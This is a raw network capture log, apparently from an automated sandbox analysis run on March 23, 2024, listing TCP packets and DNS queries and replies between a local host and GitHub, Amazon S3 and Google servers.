                                                                                      Mar 23, 2024 15:47:31.077727079 CET49866443192.168.2.16140.82.114.4
                                                                                      Mar 23, 2024 15:47:31.077740908 CET44349866140.82.114.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.080146074 CET44349865140.82.114.21192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.080451012 CET49865443192.168.2.16140.82.114.21
                                                                                      Mar 23, 2024 15:47:31.080493927 CET44349865140.82.114.21192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.080550909 CET49865443192.168.2.16140.82.114.21
                                                                                      Mar 23, 2024 15:47:31.082313061 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.082348108 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.082451105 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.082701921 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.082714081 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.162626982 CET44349870140.82.114.21192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.162700891 CET44349870140.82.114.21192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.162786007 CET49870443192.168.2.16140.82.114.21
                                                                                      Mar 23, 2024 15:47:31.163060904 CET49870443192.168.2.16140.82.114.21
                                                                                      Mar 23, 2024 15:47:31.163077116 CET44349870140.82.114.21192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.174412012 CET44349863140.82.114.21192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.174484015 CET44349863140.82.114.21192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.174552917 CET49863443192.168.2.16140.82.114.21
                                                                                      Mar 23, 2024 15:47:31.174776077 CET49863443192.168.2.16140.82.114.21
                                                                                      Mar 23, 2024 15:47:31.174818993 CET44349863140.82.114.21192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.182531118 CET44349869140.82.113.6192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.182622910 CET44349869140.82.113.6192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.182682037 CET49869443192.168.2.16140.82.113.6
                                                                                      Mar 23, 2024 15:47:31.183161974 CET49869443192.168.2.16140.82.113.6
                                                                                      Mar 23, 2024 15:47:31.183176041 CET44349869140.82.113.6192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.276366949 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.276760101 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.276787043 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.277112961 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.277473927 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.277569056 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.277658939 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.320236921 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.357564926 CET44349860140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.357932091 CET49860443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.357973099 CET44349860140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.358316898 CET44349860140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.358647108 CET49860443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.358747005 CET44349860140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.358817101 CET49860443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.400255919 CET44349860140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.421025991 CET44349864140.82.114.21192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.421108007 CET44349864140.82.114.21192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.421164989 CET49864443192.168.2.16140.82.114.21
                                                                                      Mar 23, 2024 15:47:31.421509981 CET49864443192.168.2.16140.82.114.21
                                                                                      Mar 23, 2024 15:47:31.421525002 CET44349864140.82.114.21192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.546885967 CET44349860140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.546972036 CET44349860140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.547036886 CET44349860140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.547189951 CET49860443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.547189951 CET49860443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.547879934 CET49860443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.547894955 CET44349860140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.578870058 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.579149008 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.579246998 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.579265118 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.579344034 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.579350948 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.579673052 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.579703093 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.579725981 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.579732895 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.579781055 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.579937935 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.623178959 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.623193979 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.659085035 CET49873443192.168.2.1640.68.123.157
                                                                                      Mar 23, 2024 15:47:31.659115076 CET4434987340.68.123.157192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.659230947 CET49873443192.168.2.1640.68.123.157
                                                                                      Mar 23, 2024 15:47:31.661101103 CET49873443192.168.2.1640.68.123.157
                                                                                      Mar 23, 2024 15:47:31.661114931 CET4434987340.68.123.157192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.669085979 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.672956944 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.673619032 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.673644066 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.673686028 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.673701048 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.673755884 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.673949957 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.674319983 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.674376965 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.674385071 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.674618959 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.674679995 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.674686909 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.674788952 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.674838066 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.674845934 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.674962997 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.674985886 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.675029993 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.675036907 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.675091982 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.675098896 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.675287008 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.675338984 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.675345898 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.675409079 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.675457001 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.675462961 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.707823992 CET44349867140.82.114.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.707890987 CET44349867140.82.114.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.707904100 CET44349867140.82.114.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.707952023 CET44349867140.82.114.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.707973003 CET49867443192.168.2.16140.82.114.4
                                                                                      Mar 23, 2024 15:47:31.708049059 CET49867443192.168.2.16140.82.114.4
                                                                                      Mar 23, 2024 15:47:31.708453894 CET49867443192.168.2.16140.82.114.4
                                                                                      Mar 23, 2024 15:47:31.708468914 CET44349867140.82.114.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.712266922 CET49874443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.712300062 CET44349874140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.712392092 CET49874443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.712589025 CET49874443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.712599993 CET44349874140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.717084885 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.767688036 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.767838001 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.767867088 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.767893076 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.767906904 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.767955065 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.767976999 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.768173933 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.768233061 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.768239021 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.768356085 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.768400908 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.768408060 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.768732071 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.768794060 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.768795967 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.768805027 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.768853903 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.768877029 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.769046068 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.769094944 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.769100904 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.769213915 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.769262075 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.769268036 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.769314051 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.769351959 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.769357920 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.769365072 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.769412994 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.769437075 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.769619942 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.769671917 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.769679070 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.769783020 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.769814014 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.769830942 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.769838095 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.769887924 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.769892931 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.769942999 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.769999981 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.770005941 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.770090103 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.770139933 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.770145893 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.770200014 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.770247936 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.770253897 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.781079054 CET49673443192.168.2.16204.79.197.203
                                                                                      Mar 23, 2024 15:47:31.810353041 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.810384035 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.810410023 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.810424089 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.810472965 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.861768961 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.862025023 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.862071991 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.862081051 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.862207890 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.862257957 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.862265110 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.862354040 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.862402916 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.862410069 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.862780094 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.862833023 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.862838984 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.862948895 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.863001108 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.863006115 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.863035917 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.863085985 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.863091946 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.863323927 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.863379002 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.863384962 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.863420010 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.863454103 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.863467932 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.863475084 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.863527060 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.863533020 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.863667011 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.863699913 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.863713980 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.863720894 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.863761902 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.863867044 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.864082098 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.864128113 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.864135027 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.864551067 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.864603043 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.864615917 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.864708900 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.864741087 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.864763021 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.864770889 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.864825964 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.864836931 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.865056038 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.865108013 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.865113020 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.865259886 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.865308046 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.865314007 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.865442991 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.865473986 CET44349871140.82.113.4192.168.2.16
                                                                                      Mar 23, 2024 15:47:31.865494967 CET49871443192.168.2.16140.82.113.4
                                                                                      Mar 23, 2024 15:47:31.865500927 CET44349871140.82.113.4192.168.2.16
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Mar 23, 2024 15:47:20.277513981 CET192.168.2.161.1.1.10x6bdStandard query (0)github.comA (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:20.277771950 CET192.168.2.161.1.1.10x4d7dStandard query (0)github.com65IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:20.907834053 CET192.168.2.161.1.1.10x2efdStandard query (0)github.githubassets.comA (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:20.907962084 CET192.168.2.161.1.1.10x5ec4Standard query (0)github.githubassets.com65IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:20.911571980 CET192.168.2.161.1.1.10x1ab0Standard query (0)avatars.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:20.911726952 CET192.168.2.161.1.1.10xd56fStandard query (0)avatars.githubusercontent.com65IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:21.011185884 CET192.168.2.161.1.1.10x32abStandard query (0)user-images.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:21.011317968 CET192.168.2.161.1.1.10xb554Standard query (0)user-images.githubusercontent.com65IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:21.011904955 CET192.168.2.161.1.1.10x8128Standard query (0)github-cloud.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:21.012021065 CET192.168.2.161.1.1.10x9972Standard query (0)github-cloud.s3.amazonaws.com65IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:23.317693949 CET192.168.2.161.1.1.10x3c01Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:23.317903996 CET192.168.2.161.1.1.10x281bStandard query (0)github.com65IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:25.066638947 CET192.168.2.161.1.1.10x5544Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:25.066808939 CET192.168.2.161.1.1.10xfdc2Standard query (0)www.google.com65IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:26.440965891 CET192.168.2.161.1.1.10xfd9cStandard query (0)collector.github.comA (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:26.441265106 CET192.168.2.161.1.1.10x47f6Standard query (0)collector.github.com65IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:26.986419916 CET192.168.2.161.1.1.10x4c50Standard query (0)avatars.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:26.986561060 CET192.168.2.161.1.1.10x99adStandard query (0)avatars.githubusercontent.com65IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:27.076184034 CET192.168.2.161.1.1.10xbe3bStandard query (0)api.github.comA (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:27.076420069 CET192.168.2.161.1.1.10x83a2Standard query (0)api.github.com65IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:27.491039038 CET192.168.2.161.1.1.10x105cStandard query (0)github.githubassets.comA (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:27.491264105 CET192.168.2.161.1.1.10x8f4cStandard query (0)github.githubassets.com65IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:33.256746054 CET192.168.2.161.1.1.10xfc2fStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:33.257066011 CET192.168.2.161.1.1.10x5239Standard query (0)raw.githubusercontent.com65IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:34.389908075 CET192.168.2.161.1.1.10x1eStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:34.390696049 CET192.168.2.161.1.1.10x67b5Standard query (0)raw.githubusercontent.com65IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Mar 23, 2024 15:47:20.365333080 CET1.1.1.1192.168.2.160x6bdNo error (0)github.com140.82.114.4A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:20.996378899 CET1.1.1.1192.168.2.160x2efdNo error (0)github.githubassets.com185.199.109.154A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:20.996378899 CET1.1.1.1192.168.2.160x2efdNo error (0)github.githubassets.com185.199.110.154A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:20.996378899 CET1.1.1.1192.168.2.160x2efdNo error (0)github.githubassets.com185.199.108.154A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:20.996378899 CET1.1.1.1192.168.2.160x2efdNo error (0)github.githubassets.com185.199.111.154A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:20.999720097 CET1.1.1.1192.168.2.160x1ab0No error (0)avatars.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:20.999720097 CET1.1.1.1192.168.2.160x1ab0No error (0)avatars.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:20.999720097 CET1.1.1.1192.168.2.160x1ab0No error (0)avatars.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:20.999720097 CET1.1.1.1192.168.2.160x1ab0No error (0)avatars.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:21.100461006 CET1.1.1.1192.168.2.160x32abNo error (0)user-images.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:21.100461006 CET1.1.1.1192.168.2.160x32abNo error (0)user-images.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:21.100461006 CET1.1.1.1192.168.2.160x32abNo error (0)user-images.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:21.100461006 CET1.1.1.1192.168.2.160x32abNo error (0)user-images.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:21.119379997 CET1.1.1.1192.168.2.160x8128No error (0)github-cloud.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:21.119379997 CET1.1.1.1192.168.2.160x8128No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:21.119379997 CET1.1.1.1192.168.2.160x8128No error (0)s3-w.us-east-1.amazonaws.com52.216.245.236A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:21.119379997 CET1.1.1.1192.168.2.160x8128No error (0)s3-w.us-east-1.amazonaws.com52.217.117.105A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:21.119379997 CET1.1.1.1192.168.2.160x8128No error (0)s3-w.us-east-1.amazonaws.com52.216.212.241A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:21.119379997 CET1.1.1.1192.168.2.160x8128No error (0)s3-w.us-east-1.amazonaws.com52.217.194.9A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:21.119379997 CET1.1.1.1192.168.2.160x8128No error (0)s3-w.us-east-1.amazonaws.com52.216.207.43A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:21.119379997 CET1.1.1.1192.168.2.160x8128No error (0)s3-w.us-east-1.amazonaws.com3.5.28.20A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:21.119379997 CET1.1.1.1192.168.2.160x8128No error (0)s3-w.us-east-1.amazonaws.com54.231.136.241A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:21.119379997 CET1.1.1.1192.168.2.160x8128No error (0)s3-w.us-east-1.amazonaws.com3.5.25.228A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:21.120935917 CET1.1.1.1192.168.2.160x9972No error (0)github-cloud.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:21.120935917 CET1.1.1.1192.168.2.160x9972No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:23.406040907 CET1.1.1.1192.168.2.160x3c01No error (0)github.com140.82.113.4A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:25.154205084 CET1.1.1.1192.168.2.160x5544No error (0)www.google.com142.251.32.100A (IP address)IN (0x0001)false
                                                                                      Mar 23, 2024 15:47:25.154664993 CET1.1.1.1192.168.2.160xfdc2No error (0)www.google.com65IN (0x0001)false
